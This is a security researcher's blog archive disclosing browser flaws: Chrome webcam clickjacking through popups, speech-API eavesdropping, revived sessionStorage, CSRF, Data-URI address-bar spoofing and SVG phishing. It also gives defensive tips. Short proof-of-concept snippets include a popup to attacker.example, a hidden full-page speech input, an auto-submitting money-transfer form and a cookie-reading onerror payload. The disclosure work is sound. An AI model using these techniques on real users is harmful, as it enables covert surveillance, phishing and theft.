Category Archives: Security

Webcam spying with Chrome

tl;dr;

Browsers don’t handle webcam permissions well enough. Users should be extremely wary about what’s going on in their browser. From a list of ~30 bugs I submitted to Google regarding that issue, most have been fixed, but some are still alive.
The most obvious bug which is still live and kicking in all of the browsers is PopJacking – clickjacking using popups. This flaw can be abused to trick users into allowing malicious access to their webcam, for example.

Video of the 5 POCs is here

Full text

More than a year ago (6.6.2014) I submitted a list of ~30 security bugs regarding the way Chrome handles webcam access. These bugs also concerned the way Chrome handled almost every other kind of special permission, from webcam/mic access to location.

Some of these were related to bugs and bad implementations of popups, and to abusing them in relation to webcam access.

Yesterday Google made my bug report public, so I figured it’s about time I share my findings (all of these links and info were private until now):

This is the original post I privately sent to Google; it has all the info

A video with 5 different POCs

The POC and source code

The bug thread on Google

While Google fixed most of these bugs, some are still unfixed. But even those that were fixed are not fixed well enough, and are still vulnerable to PopJacking. Meaning, an attacker can still trick a user into allowing webcam access – pretty easily.
PopJacking is merely clickjacking using a popup – probably the most overlooked flaw in browsers since clickjacking.
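To make the concept concrete, here’s a minimal hypothetical sketch of the idea (my illustration, not the actual POC from the report): bait the user into clicking rapidly, then open a popup so that the permission prompt lands right under the cursor.

    <button id="play">Whack the mole! Click as fast as you can!</button>
    <script>
      var clicks = 0;
      document.getElementById('play').onclick = function () {
        if (++clicks === 5) {
          // Open a small popup under the user's cursor mid click-frenzy;
          // a page in it immediately requests the webcam, and the user's
          // next frantic click lands on "Allow". (attacker.example is
          // obviously a made-up host.)
          window.open('https://attacker.example/cam.html', '_blank',
                      'width=320,height=180,left=' + (window.screenX + 60) +
                      ',top=' + (window.screenY + 120));
        }
      };
    </script>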

Another side note here is about Google’s behaviour regarding this bug:
At first they seemed thrilled about it, but then it took them almost a year to fix most of it. Only to eventually declare it as “Wontfix”.
One of the bugs I submitted was opened as a different, private bug, but anyone can easily figure out which one it is from the conversation in the currently open bug thread.

From the way Google dealt with this bug and some other security bugs myself and others have submitted, it’s clear that Google greatly prefers to dismiss security bugs as “Wontfix” or “not a bug”. Anything other than RCE or XSS will have difficulty fitting in.
I’m pretty sure that something like clickjacking would have been immediately dismissed, only for the mistake to be realised afterwards.
More on that, with some examples, in a later post.

So are we safe now?

– No.
It’s still too damn easy to trick a user into allowing something like webcam access, and that’s true for other browsers, not just Chrome. Be extremely wary of where you click and what’s going on in your browser at all times. The indication that a website is accessing your camera is not clear enough – you gotta be wary. (Firefox’s indication is much better, btw.)

Popups are evil

Besides the specific security bugs in popups and the way they can be exploited for PopJacking, I would argue that there is not even one legitimate use of browser popups in terms of user experience.

Browser vendors should just kill popups altogether, forever.

 

The never ending browser sessions

tl;dr;

The concept of session memory is not valid anymore in today’s browsers. Even sessionStorage is not cleared after closing the tab; it’s easily revived by clicking “Reopen closed tab”. That might seem like a bug – but not if you look at the spec, which is rather permissive, maybe too permissive.

So what’s the problem really?

Imagine you log in to your bank’s website from a trusted 3rd-party computer.
When you’re done, you simply click the X button to close the site, assuming that your session will be done. This used to be true for many years, since it was common for critical websites like banks to store the authentication token in a session cookie.
And session cookies, as the name implies, are gone when the session is gone. The problem is that with tabbed browsing, and browsers running in the background, that session might end a long time after you clicked on the X.
This means that most of the time, anyone accessing that computer after you will be able to continue where you left off – logged in as you.

sessionStorage to the rescue? – not really

So if session-cookies are not good enough, what about that shiny sessionStorage?
It’s isolated per tab and cleared when that tab is closed.
It must be good – you click the X and it’s gone.
Well almost…
In Chrome and Firefox the session storage is easily revived with right click and “Reopen closed tab” and “Undo close tab” respectively.

This strange and unexpected behavior of the sessionStorage still complies with the spec, which is somewhat over-permissive:
“The lifetime of a browsing context can be unrelated to the lifetime of the actual user agent process itself, as the user agent may support resuming sessions after a restart.”

We can argue whether this is a bug or not, but it’s definitely a bad feature and should be mitigated. We should have a real session storage which we can trust to be cleared when we click on the “X”, without unreliable tricks like onbeforeunload and the like.

Here’s a demo: close the tab and reopen it with “Reopen closed tab” – the sessionStorage will be revived.
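If you want to reproduce it yourself, the linked demo boils down to something like this (a minimal sketch; the key name is made up):

    // Run this once in a tab, close the tab, then "Reopen closed tab":
    if (!sessionStorage.getItem('secret')) {
      sessionStorage.setItem('secret', 'token-' + Date.now());
    }
    // The "secret" survives the reopen in Chrome and Firefox.
    document.title = sessionStorage.getItem('secret');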

While Chrome and Firefox behave badly and revive the sessionStorage, Safari and IE11 don’t revive it and are the safer browsers in that regard.

Bottom line

As a user, always always log out manually; never rely on just closing the tab or the browser.

As a developer, the only way to create real sessions that are gone when the user closes the tab is to keep anything critical in memory and only in memory. I’ve written more about it, with examples, here.

 

Sharing sessionStorage between tabs for secure multi-tab authentication

tl;dr;
I’ve created a mechanism that leverages the secure nature of the browser’s sessionStorage or memoryStorage for authentication, while still allowing the user to open multiple tabs without having to re-login every time.

A refresher about relevant browser storage mechanisms

  1. localStorage – ~5MB, saved forever or until the user manually deletes it.
  2. sessionStorage – ~5MB, saved for the life of the current tab.
  3. cookie – ~4KB, can be saved for up to infinity.
  4. session cookie – ~4KB, deleted when the user closes the browser (not always deleted).

 

Safe session-token caching

When dealing with critical platforms, it is expected that the session ends when the user closes the tab.
In order to support that, one should never use cookies to store any sensitive data like authentication tokens. Even session cookies will not suffice, since they continue to live after closing the tab and even after completely closing the browser.
(We should consider not using cookies anyway, since they have other problems that need to be dealt with, e.g. CSRF.)

This leaves us with saving the token in memory or in the sessionStorage. The benefit of the sessionStorage is that it persists across different pages and browser refreshes. Hence the user may navigate to different pages and/or refresh the page and still remain logged in.

Good. We save the token in the sessionStorage and send it as a header with every request to the server in order to authenticate the user. When the user closes the tab – it’s gone.
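In code it’s as simple as this (a sketch; the header and key names here are just examples):

    // After a successful login:
    var tokenFromServer = 'abc123'; // received from the login response
    sessionStorage.setItem('authToken', tokenFromServer);

    // With every request to the server:
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/api/account');
    xhr.setRequestHeader('Authorization',
                         'Bearer ' + sessionStorage.getItem('authToken'));
    xhr.send();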

But what about multiple tabs?

It is pretty common, even in single-page applications, that the user will want to use multiple tabs. The aforementioned security enhancement of saving the token in the sessionStorage will create some bad UX in the form of asking the user to re-login with every tab he opens. Right, sessionStorage is not shared across tabs.

Share sessionStorage between tabs using localStorage events

The way I solved it is by using localStorage events.
When a user opens a new tab, we first ask any other open tab whether it already has the sessionStorage for us. If any other tab is open, it sends us the sessionStorage through a localStorage event, and we duplicate that into our own sessionStorage.
The sessionStorage data will not stay in the localStorage, not even for 1 millisecond, as it is deleted in the same call. The data is shared through the event payload and not the localStorage itself.
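Here is the heart of the mechanism as a minimal sketch (the key names are mine; see the demo source for the real thing):

    // On load: if this tab has no sessionStorage, ask the other tabs for it.
    if (!sessionStorage.length) {
      localStorage.setItem('getSessionStorage', Date.now());
    }

    window.addEventListener('storage', function (event) {
      if (event.key === 'getSessionStorage') {
        // Another tab asked for the sessionStorage -> send it over, then
        // delete it immediately; the data travels in the event payload only.
        localStorage.setItem('sessionStorage', JSON.stringify(sessionStorage));
        localStorage.removeItem('sessionStorage');
      } else if (event.key === 'sessionStorage' && event.newValue &&
                 !sessionStorage.length) {
        // Another tab sent us its sessionStorage -> duplicate it locally.
        var data = JSON.parse(event.newValue);
        for (var key in data) {
          sessionStorage.setItem(key, data[key]);
        }
      }
    });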

Demo is here

Click “Set the sessionStorage”, then open multiple tabs to see that the sessionStorage is shared.

Almost perfect

We now have what is probably the most secure way to cache session tokens in the browser, without compromising the multiple-tab user experience. This way, when the user closes the tab he knows for sure that the session is gone. Or is it?!

Both Chrome and Firefox will revive the sessionStorage when the user selects “Reopen closed tab” and “Undo close tab” respectively.
Damn it!

Safari does it right and doesn’t restore the sessionStorage. (Tested only with these 3 browsers.)

For the user, the only way to be completely sure that the sessionStorage is really gone is to reopen the same website directly, without the “Reopen closed tab” feature.
That is, until Chrome and Firefox resolve this bug. (My hunch tells me they will call it a “feature“.)

Even with this bug, using the sessionStorage is still safer than a session cookie or any other alternative. If we want to make it perfect, we’ll need to implement the same mechanism using memory instead of sessionStorage. (onbeforeunload and the like can work too, but won’t be as reliable and will also clear on refresh. window.name is almost good, but it’s too old and has no cross-domain protection.)

Sharing memoryStorage between tabs for secure multi-tab authentication

So… this is the only really safe way to keep an authentication token in a browser session while still allowing the user to open multiple tabs without having to re-login.

Close the tab and the session is gone – for real this time.

The downside is that with only one tab open, a browser refresh will force the user to re-login. Security comes with a price; obviously this is not recommended for every type of system.

Demo is here

Set the memoryStorage and open multiple tabs to see it shared between them. Close all related tabs and the token is gone forever. (memoryStorage is just a JavaScript object.)
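The mechanism is the same as the sessionStorage version above, only the target store is a plain object (again, a sketch with made-up key names):

    // memoryStorage is just a JavaScript object - closing the tab kills it.
    var memoryStorage = {};

    // On load: ask the other tabs for their memoryStorage.
    localStorage.setItem('getMemoryStorage', Date.now());

    window.addEventListener('storage', function (event) {
      if (event.key === 'getMemoryStorage') {
        // Send our copy; it travels in the event payload, never stored.
        localStorage.setItem('memoryStorage', JSON.stringify(memoryStorage));
        localStorage.removeItem('memoryStorage');
      } else if (event.key === 'memoryStorage' && event.newValue) {
        memoryStorage = JSON.parse(event.newValue);
      }
    });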


P.S.
Needless to say, session management and expiration should be handled on the server side as well.

To Listen Without Consent – Abusing the HTML5 Speech

tl;dr;
I found a bug in Google Chrome that allows an attacker to listen in on the user’s speech without any consent and without any indication. Even blocking all access to the microphone under chrome://settings/content will not remedy this flaw.

Try the live demo… (Designed for Mac, though it will work similarly on any other OS)

Watch the video…


The Sisyphus of computer science

Speech recognition is like the Sisyphus of computer science. We’ve come a long way but still haven’t reached the top of that hill. With all that crunching power and sophisticated algorithms, computers still can’t recognise some basic words and sentences, the kind the average human digests without breaking a sweat. This is still one of the areas where humans easily win over computers. Savor these wins, as they will not last much longer ;)

One must appreciate Google for pushing this area forward and introducing speech recognition into the Chrome browser. The current level of speech support in Chrome allows us to create applications and websites that are completely controlled by speech. It opens vast possibilities – from generally improved accessibility to email dictation and even games.

The current speech API is pretty decent. It works by sending the audio to Google’s servers and getting back the recognised text. The fact that it sends the audio to Google has some benefits, but from an application point of view it will always suffer from latency and will not work offline. I believe the current speech support was introduced with Chrome 25. From Chrome 33 one can also use the Speech Synthesis API. – Amazing!

But…
Before this fine API we currently have, Google experimented with an earlier version of the API. It works much the same; the main difference is that the older API doesn’t work continuously and needs to be restarted after every sentence. Still, it’s powerful enough, and it has some flaws that enable it to be abused. I believe this API was introduced with Chrome 11, and I have good reason to believe it has been flawed since then.


More Technical Details

Basically, this attack abuses Chrome’s old speech API, the -x-webkit-speech feature.
What enables this attack are these 3 issues (a sketch follows the list):

  1. The speech element can be resized to any size and set to any opacity, and still stay fully functional.
  2. The speech element can be made to take over all clicks on the page while staying completely invisible. (No need to mess with z-indexes)
  3. The indication box (shows you that you’re being recorded) can be obfuscated and/or be rendered outside of the screen.
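A sketch of what issues 1 and 2 amount to in practice (hypothetical markup, using the attribute as written in the POC):

    <!-- Stretch the speech input over the entire page and make it
         invisible; per the issues above it stays fully functional,
         so any click on the page hits the microphone button. -->
    <input -x-webkit-speech style="position:fixed; top:0; left:0;
           width:100%; height:100%; opacity:0" />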

The POC is designed to work on Chrome for Mac, but the same attack can be made to work with any Chrome on any OS.

This POC uses full-screen mode to make it easier to hide the “indication box” outside of the screen.
It is not mandatory to use HTML5 full-screen; it just makes this demo easier.

As you can see in the demo and video, there is absolutely no indication that anything is going on. There are no other windows or tabs, and no hidden popup or pop-under of any kind.
The user will never know this website is eavesdropping.

In Chrome, all one needs in order to access the user’s speech is this line of HTML5 code:
<input -x-webkit-speech />

That’s all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone, he will be recorded. The user will see the “indication box” telling him to “Speak now”, but that can be pushed out of the screen and/or obfuscated.

That is enough to listen to the user’s speech without any consent and without giving him any indication. The other bugs just make it easier, but are not mandatory.

(For the tree in the demo I have used a slightly altered version of the beautiful canvas tree from Kenneth Jorgensen)

— The bug was reported to Google.

[Screenshot: grey_mic]

Found a CSRF Flaw in a Big E-Commerce Website

tl;dr

I stumbled upon some CSRF flaws in a very popular e-commerce website. CSRF flaws are generally overlooked, and the only way for you as the user to minimize the risk is to log out from a website after you’ve finished using it. This limits the window of vulnerability to the time you spend on the website. I have disclosed my findings to the e-commerce website and will post them here after they finish fixing it.

This is how these CSRF flaws generally work

When you log in to a website, you get back a cookie that indicates who you are and the fact that you are authenticated.
Now, for better user experience, and so you won’t need to re-login, most websites tell your browser to keep the cookie for a very, very long time (up to 10 years is considered safe).
The problem is that if a website suffers from any CSRF flaws, and many still do, then from now on, every time you visit any unrelated internet content, it may be attacking you. Think of all the slightly phishy content you’ve stumbled upon over the past years; some of it could have been attacking you.
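In its classic form, such an attack is nothing more than an auto-submitting form on the attacker’s page (a sketch with a hypothetical bank URL):

    <form action="https://bank.example/transfer" method="POST" id="csrf">
      <input type="hidden" name="to"     value="attacker">
      <input type="hidden" name="amount" value="1000">
    </form>
    <script>
      // The victim's browser happily attaches the bank's cookies
      // to this request - no user interaction needed.
      document.getElementById('csrf').submit();
    </script>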

A famous case of a CSRF attack against a bank used a legitimate ad and abused a flaw in the bank’s website to transfer users’ money. Gmail suffered from a CSRF flaw in its early days, leaking all of its users’ contacts.

CSRF flaws are used to steal sensitive data from users and to perform actions on the user’s behalf. The flaws I found enable both – an attacker can steal a user’s personal data and also mess with his assets.

How I stumbled upon it

I was surfing on an open public WiFi – generally a bad thing to do, but I needed to. This public WiFi had a phishy name, “eyes2”, and there were a few other “eyes” circling around – “eyes1”, “eyes2”, “eyes3”, etc. Call me paranoid, but it seems to me that these access points were put there in order to eavesdrop. Might be just for fun, might be more. Anyhow, I generally don’t care as long as I keep all of my traffic in SSL; I don’t mind them getting my metadata. So I went to this huge e-commerce website just to check something, and was amazed that it’s not all SSLed. Wow… I wondered… what kind of data have I just leaked to the MITM from the “eyes2” access point?! Apparently, if someone was eavesdropping on my connection, they now knew exactly who I am – and more.

The fact that a website deals with even slightly sensitive data and doesn’t use SSL for all of its traffic is a flaw on its own. But SSL is not related to these specific flaws; in fact, using SSL doesn’t help prevent CSRF. It’s only because I wanted to know exactly what kind of data this website leaked by using plain HTTP and not HTTPS (SSL) that I found out it’s also vulnerable to CSRF attacks.

Where are all the details?

I reported my findings to the e-commerce website. It took me way longer to find the appropriate way to contact them than to find the flaws and PoC them. I did eventually manage to report it; they were very responsive about it, and it seems like they’ve already started to fix it. I will post all the details after they finish fixing it.

As a website owner, it’s important to implement CSRF prevention from the get-go. Most web frameworks have their own solutions already. It’s very easy to overlook; it’s very easy to use something like JSONP and forget how vulnerable it can be, for example.
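For those rolling their own, the classic mitigation is the synchronizer-token pattern. A minimal Express-style sketch (all names here are my own, and the session/body-parsing middleware is assumed to be configured):

    var crypto  = require('crypto');
    var express = require('express');
    var app = express();
    // (session and body-parsing middleware assumed to be configured)

    app.get('/form', function (req, res) {
      // Issue a random token, tied to the session, embedded in the form.
      req.session.csrfToken = crypto.randomBytes(16).toString('hex');
      res.send('<form method="POST" action="/transfer">' +
               '<input type="hidden" name="csrfToken" value="' +
               req.session.csrfToken + '"/></form>');
    });

    app.post('/transfer', function (req, res) {
      // A cross-site form can send the cookies, but cannot know the token.
      if (req.body.csrfToken !== req.session.csrfToken) {
        return res.status(403).send('CSRF check failed');
      }
      // ...perform the action
      res.send('ok');
    });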

How to protect yourself

CSRF generally relies on cookies. What you can do to protect yourself is to log out or delete your cookies after you’ve finished using a certain website. That won’t be bulletproof, since you’ll still be vulnerable to attacks while you’re logged in. The only way to be completely safe is to use only 1 window with only 1 tab while you are logged in.

Obviously all of this is a complete hassle, and website owners should be the ones responsible for their CSRF flaws. The user can’t be expected to do it.

If you’re using Firefox you can use something like NoScript, which also involves some level of annoyance.

Abusing The HTML5 Data-URI

[Update: Some of these examples were mitigated in Chrome 38 and 39]

After seeing in the previous post how Data-URIs can be used as a mechanism to easily carry malicious code, I’ll elaborate more on the issues they present.

Some of these issues merely stem from the way Data-URIs are designed and implemented, and some might be considered security bugs in the browsers.

Using Data-URI to manipulate the address bar

The simplest thing an attacker can do is add spaces after the “data:” in the URI, and by that make it look like some kind of internal Chrome page.

It will also change the link status at the bottom of the browser: the link will show “data:”, hiding all the base64 code that is there. It’s a way to manipulate the status bar without needing JavaScript; hence the link will be manipulated even in an environment that doesn’t allow JavaScript.
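For example, something along these lines (a sketch with a shortened, harmless payload; this reflects the behavior at the time):

    <!-- Spaces right after "data:" push the payload out of view; the
         status bar and address bar show only "data:". The base64 here
         decodes to a harmless <h1>Hi</h1>. -->
    <a href="data:                                                        text/html;base64,PGgxPkhpPC9oMT4=">
      Looks like an internal page
    </a>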

Combine that attack with the previous example of the phishing SVG and you can get catastrophic results. Lots of users might believe this is an internal Chrome page.

Live example (Open in Chrome)

[Screenshot: data_address_bar]

In the above example the user will see only “data:..” in the address bar, but if he feels uncomfortable he can still examine the address bar and might find the hidden base64 code.

The next example will show how to prevent the user from examining the address bar at all: it will always show “data:”, and the 3 dots indicating there might be more to it will be removed as well.

By making the original content larger than ~28KB, the address bar will always show “data:” and only “data:”.

[Screenshot: data_status_bar]

Live example of only data in the address-bar (Open in Chrome)

[Screenshot: data_big_address_bar]

While Chrome is the most vulnerable to the space attack, other browsers will fall for it too.

Firefox trims the spaces when you click on the link, but an attacker will still be able to manipulate the status bar (at the bottom of the browser), as we’ll see in the next vector.

Safari doesn’t trim the spaces, but instead converts them to %20 or any other Unicode-escaped representation of a space. It’ll work with any combination of Unicode spaces.

[Screenshot: data_safari_address_bar]

Mobile Chrome for iOS: it was a bit surprising to see that the iOS version of Chrome falls for the “over 28KB base64” attack as well.

[Screenshot: data_chrome_iphone]

It’s interesting to see that even Chrome for iOS, which is a very different environment, shares the shell code with all the other Chrome browsers.


Tricking the user into downloading malicious content using the Data-URI

We’ve already seen how one can abuse the browser’s address bar and status bar by simply adding spaces after the “data:” in the link.

But what if we add some other character, other than a space? In that case, the user will be prompted to download a file (and by default the user won’t even be prompted – the file will just download).

How convenient for an evil one. Combining that with the previous stuff…

The user will see data:http://google.com/graphics/doodle.svg in the status bar; clicking the link will automatically download the attacker’s malicious SVG file that is hiding in the base64 code inside the link.

[Screenshot: data_doodle_chrome]

Click to download doodle.svg (not really a doodle)

As noted before, Firefox trims the spaces after the “data:”, but one can use %20 instead. Also, Firefox does a good job and puts an ellipsis in the middle of the link in the status bar, so the user will see the suspicious gibberish base64 at the end. But that can easily be overcome by simply adding spaces at the end of the link as well.

[Screenshot: data_doodle_firefox]

Click to download doodle.svg (FireFox version)

The interesting thing is that this kind of attack doesn’t limit us to SVG; any kind of file can be downloaded this way – any kind of binary file as well.

How about an EXE? (That EXE does nothing but echo some text to the terminal.)
(Will add it later)

Remember COM executables? Only a few bytes; 32-bit Windows will still run them, and many of these are still out there.

COM executable

A ZIP file is a great vector for badness, IMHO

ZIP with baddies inside (not real baddies, just text files)

[Screenshot: chrome_zip_download]

While on Windows an attacker will also need to trick the user into changing the extension of the file, or into opening it with a certain app via “Open With…”, on the Mac these extensions don’t matter much.

The file will be opened or executed according to its real type.

The newer Mac OSes have this great feature called Gatekeeper that makes running applications much more secure in general.

The default setting is “from the App Store AND identified developers”. How difficult is it for a motivated attacker to become an “identified developer”?

If the user has disabled Gatekeeper, the app will just run when clicked.

It will probably work on old Macs, but anyway, I think the most dangerous attack would be using just a zip file with all kinds of baddies inside.

The user flow might be:

  1. Click on a link -> the file is immediately downloaded (there is no wait, as the file is already embedded in the page).
  2. Click on the downloaded file -> the file is automatically extracted (if the zip is small enough, the user won’t notice much going on, as the extraction will be fast).
  3. Malicious apps are now spread all over the user’s Downloads folder.
  4. “Hopefully” one day the user will notice these apps with their inviting names and will run one of them – thinking he downloaded it himself.

These are most of the browsers I’ve tested on; other browsers may behave differently. Generally it works the same on Ubuntu as well.

IE (Internet Explorer) does not suffer from most Data-URI flaws – it achieves that by not supporting most of their features. I don’t think that getting away with it by not supporting the feature is generally a good thing.

Final notes about these vectors: (repeating some from the previous post)

  1. Remember that no JavaScript is needed for any of this; all that is needed is a link. It’ll work just the same with JavaScript disabled.
  2. No server is involved either.
  3. All an attacker needs is a bunch of strings, and the user’s browser will do all the rest.
  4. AV won’t scan these links.
  5. Not easily blockable – there is no domain to block.
  6. More easily shared and distributed.
  7. The attack is also cached in the browser history and doesn’t need an Internet connection to be present at the moment of the attack.
  8. It will propagate across devices. For example, if you’re signed in to Chrome, the attack will propagate to all of your devices. (You’ll still have to run it on each device though; just type “data” in the address bar.)
  9. It can be easily embedded in an innocent-looking *.URL file. Who doesn’t click on these? It always felt safe.

 

— Reported the bug to Google.

SVG For Fun and Phishing

What an awesome format SVG is, so powerful and so well supported by browsers. And yet it is barely being used; it’s not getting the love it deserves. Well, browsers love SVG, perhaps too much…

SVG files are like little bundles of joy, encapsulating graphics, animations and logic. One can write a full app or game all encapsulated in one SVG file. That SVG file can be compressed into a binary file with the extension SVGZ and browsers will still accept it.

It’s way less powerful than Flash, but the concept is similar – vector graphics and logic in one binary file. And like Flash SWF files, these files tend to go viral and get redistributed. By that I mean, once you release your attack into the wild it can end up hosted on many other servers. A good example would be tiger.svg.

Remember the lovely Flash dog? It can work just the same, and even worse.

SVGs also run from local files. By default on Windows, SVG files are opened in IE, which will run the script with local privileges when the file is double-clicked.

Anyhow, SVGs have some flaws built into them; many are known, some are new. I would argue that even without the new flaws, an SVG file is somewhat dangerous by design. I wanted to see how easy it would be to abuse SVG for phishing. I picked an easy target – Chrome’s “Sign In” page. It was pretty easy to create an almost fully functional version of the Chrome Sign In page.

Check it out – only 5KB of SVG “image”

Compressed as SVGZ, only 2KB (Chrome will run it just fine)

Note: Google has already changed the appearance of this page, but it’s almost identical to the previous version.

The real page is generally here (Google already changed the way it looks)

Letting SVG files execute JavaScript is actually the root of the problem; I’m not sure it serves any real purpose in today’s web.
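To see how little it takes, here is a complete, valid SVG “image” that executes script the moment it’s rendered (a harmless sketch):

    <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
      <circle cx="100" cy="100" r="80" fill="green"/>
      <!-- Perfectly legal SVG - and it runs like any page script: -->
      <script>alert('this "image" just ran JavaScript');</script>
    </svg>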

A simple attack might go like this:

  • The attacker sends the victim an email with a malicious SVG file: “Check out this cool image / animation”.
  • The victim downloads the SVG and clicks / double-clicks on it.
  • The SVG is opened in the browser.
  • The attack takes place.

The JavaScript that runs will have local privileges and can easily attack the user (limited to the browser sandbox, of course). It can, for example, execute multiple cross-domain CSRF attacks (cookies are sent normally with every request) and/or load multiple other attack vectors. It can be abused for spam, and that is not even illegal as long as the attacker doesn’t do anything too malicious.

You may be thinking “so what?!” – you can script the user from an HTML page just as well.

There are a few differences, as most users will look at an SVG file as just another image.

  1. When you double-click on an image to view it, it can’t execute anything – an SVG can.
  2. SVG files get redistributed – there are numerous clip-art sites that will host the evil SVG for the attacker.
  3. The malicious code embedded in SVG files will survive editing the file in graphic editors like Adobe Illustrator and Inkscape.

I would say that the main problem here is not what SVG files are capable of doing; it’s more about the way they can get malicious code to slip through the user’s normal defenses.

Wait, there is more…


Even more fun with SVG and HTML5 Data-URI

Another great feature of HTML5 is the Data-URI. Now, SVG works great with Data-URIs. Malicious SVG works amazingly great with Data-URIs.

SVG encoded as Base64 will run directly from a link.
Some might call this a feature, but it can be exploited for phishing attacks.
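Turning an SVG payload into a self-contained link takes a couple of lines (a sketch):

    // Encode the SVG payload as Base64 and wrap it in a Data-URI -
    // no hosting, no server, just a string to share:
    var svg  = '<svg xmlns="http://www.w3.org/2000/svg">' +
               '<script>alert(1)<\/script></svg>';
    var link = 'data:image/svg+xml;base64,' + btoa(svg);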

POC of an SVG phishing attack embedded in an HTML5 Data-URI

Some of the attacker’s benefits are:

  1. This is just a link; no need to host anything.
  2. AV won’t scan these links.
  3. Not easily blockable – there is no domain to block.
  4. More easily shared and distributed.
  5. The attack is also cached in the browser history and doesn’t need an Internet connection to be present at the moment of the attack.
  6. It will propagate across devices. For example, if you’re signed in to Chrome, the attack will propagate to all of your devices. (You’ll still have to run it on each device though; just type “data” in the address bar.)
  7. It can be easily embedded in an innocent-looking *.URL file. Who doesn’t click on these? It always felt safe.

Everything said here is valid for all formats supported by Data-URIs; text/html is also notable:
Here is an example

Actually, Data-URIs have their own set of problems, which are not necessarily related to SVG. SVG works perfectly with them, but the issues are more general. I’ll elaborate more in another post.

More about the demo (Chrome Sign In)

I don’t want to give too many ideas to the bad guys, but the possibilities here are endless; I can already think of far nastier vectors than this demo.

This specific demo includes an image of the Google logo. I managed to create the Google logo as an SVG in about 7KB, but the Google logo in the demo is small and not too noticeable anyhow; it felt like a waste of KBs.

I found that the font used by Google for their logo is Catull, which is an old-style serif typeface and is similar to… you guessed it… Georgia. That was good enough. Georgia is preinstalled on all OSs.

I know it might look horrible to font and aesthetics lovers, but the average victim will easily fall for it.

One of the most important features of this attack is the SVG text input. The user will need to enter his credentials somewhere.

Text inputs are not natively available in SVG, though there have been some attempts to create them.

I didn’t create fully functional text inputs; I didn’t think it was appropriate for me to do so at this point – for various reasons. For one, I didn’t want to make it too easy to replicate this attack in the real world. I’m sure that nearly perfect SVG text inputs can be created relatively easily – one just needs enough motivation.

What about mobile?

Smartphones are just fine with SVG; more on that later as well.

Some tips to keep you safe

  1. Be alert when clicking on links that lead to SVG files or Data-URIs.
  2. Don’t double-click on SVG files to preview them in your browser.
  3. Don’t preview unknown or unchecked SVG files in your browser.
  4. Don’t edit and re-export an SVG in Adobe Illustrator or Inkscape without knowing where it came from and making sure it has no malicious script.

Protecting Your Smart Phone, the Basics

iPhone

  1. Don’t jailbreak; a non-jailbroken iPhone is a pretty secure device.
  2. Use a PIN code: Settings -> General -> Passcode (and not something like 1234).
  3. Make sure data is really encrypted – it’s the default since the iPhone 4 (which has hardware encryption). If you have an older model, go to Settings -> General -> Passcode and look for “Data Protection is Enabled” at the bottom.
  4. Don’t install any profiles you’re not absolutely sure about. I saw that some ad companies have started to use these profiles in order to overcome the App Store restrictions. If you see something like this, don’t approve it unless you’re absolutely sure. Here’s some more info about the danger of malicious profiles.
  5. Consider using an alphanumeric passcode by setting “Simple Passcode” to “Off”.
  6. Consider not using “Find My iPhone”. This is a trade-off: “Find My iPhone” is a really great tool for finding your lost phone, but there is a single point of failure, which is your Apple ID. Accessing it gives attackers your exact position and an easy way to wipe all of your phone’s data.

Android

  1. Don’t root your phone.
  2. Use a screen lock.
  3. Encrypt data – works better on Android 4.0 and above; might affect performance (it does not encrypt the external SD card).
  4. Use a security app like Lookout or Avast – it’s free!
  5. Don’t install an app unless you have a decent amount of confidence in it, and also check the permissions it requires. Remember to uninstall it if it’s useless.

We all know that Android is open and its apps need no approval, which makes it more vulnerable by nature. This openness has another aspect of vulnerability: external SD cards vary in quality, and because of that the Android OS doesn’t encrypt them – it can’t promise good enough performance on cheap external memory. Which makes sense in a way; you’re somewhat compromising security by being open.

Windows Phone 8
I never had a Windows Phone 8, only a 7.5, but it’s obvious that Microsoft is betting big on their most loyal enterprise customers, who need enterprise security. From reading online, it seems that it has built-in encryption, but not for the SD card (same as Android).

Common sense still applies.

  1. Use a screen lock.
  2. Encryption is built in for you; just don’t save anything important on the external SD card.

HTML5 Mobile Apps – Injection Heaven, Security Hell

Three weeks ago Path.com was fined for stupidly stealing their users’ contact lists and saving them onto their servers. Path’s doing was obviously wrong, but I’m not sure their punishment was really justified – having to pay this enormous bribe to the FTC, using COPPA as an excuse. The lesson here is to always comply with COPPA.

Anyhow, in that same TechCrunch article you can also find that “The FTC also took the opportunity to introduce a new set of guidelines for mobile developers“. Although they explain early in that article that it’s not meant to be a guideline, I still feel they miss a lot.

When it comes to HTML5 apps, even the simplest app can greatly compromise the user’s privacy and security. Take the FTC’s example of a simple and harmless alarm-clock app: if that app is built using HTML5, its size and complexity don’t matter. All that is needed is one JavaScript injection that passes through.

How will that code be injected, you may ask? All that is needed is for the app to load some content from a remote server. The simplest example would be the “Terms and Conditions” page, which is usually loaded into a WebView. It can be a more “complex” setting, like choosing a favorite color or loading the saved alarms. Any kind of sharing will probably be far more open to exploitation, e.g. “share your favorite alarms”. Push messages might also bring malicious code. Etc.

The bottom line is that any injection of JavaScript will give an attacker a lot of control over the device, and more often than not it’ll be persistent. HTML5 apps usually use the localStorage, which is rarely flushed, and leverage native DBs and the file system. The “page” or WebView is rarely refreshed, so even if the injection is not persistent, it’ll be alive for a long time.
Things like stealing the user’s contact list and tracking the user’s location are pretty common – enabled by default in PhoneGap for iPhone, for example.

It’s only limited by the native API that is exposed to JavaScript, and generally it’s very open, even more than the default PhoneGap API. I know of at least 1 popular HTML5 app that exposes almost all of the Android native API.

You see, JavaScript is one tough beast – it can run almost anywhere.
JavaScript was basically designed as an unimportant sidekick to the browser’s HTML: “it should not cause any problems by being poorly written and should fail silently and not interfere with the main thing, which is HTML.” Seriously, that’s how it was; we’re lucky it’s not case-insensitive. I’m sure that back then some people thought it would make things simpler and better.
So, JavaScript will run in any DOM element, no matter how naive you may think that element is; it will run in unexpected parts of the element without needing the <script> tag, e.g. onerror=”attack()”. It used to even run from CSS and from images, but we’re over that now, afaik, in mobile browsers.
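A tiny example of the kind of string that slips through – no <script> tag anywhere (hypothetical payload):

    <!-- Imagine this arriving as a "favorite alarm name" from the server;
         the broken image fires onerror and the payload runs: -->
    <img src="nope.png" onerror="alert(document.cookie)">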

As opposed to that, it would take a very special case for an injection to be able to execute arbitrary native code. You can make a native Android app that will run anything – even get root – but I doubt that any legitimate app regularly downloads strings and runs them as commands. (Basically, on a rooted Android you can do exec(“su”) and everything else.)

With JavaScript, the app does not need to be designed in any special way; an unsanitized string is likely to execute.

These kinds of injections are not solely a problem of PhoneGap-based applications.
In any app that uses HTML5, even if it’s mostly native, any API that is exposed to JavaScript can be leveraged by an attacker.

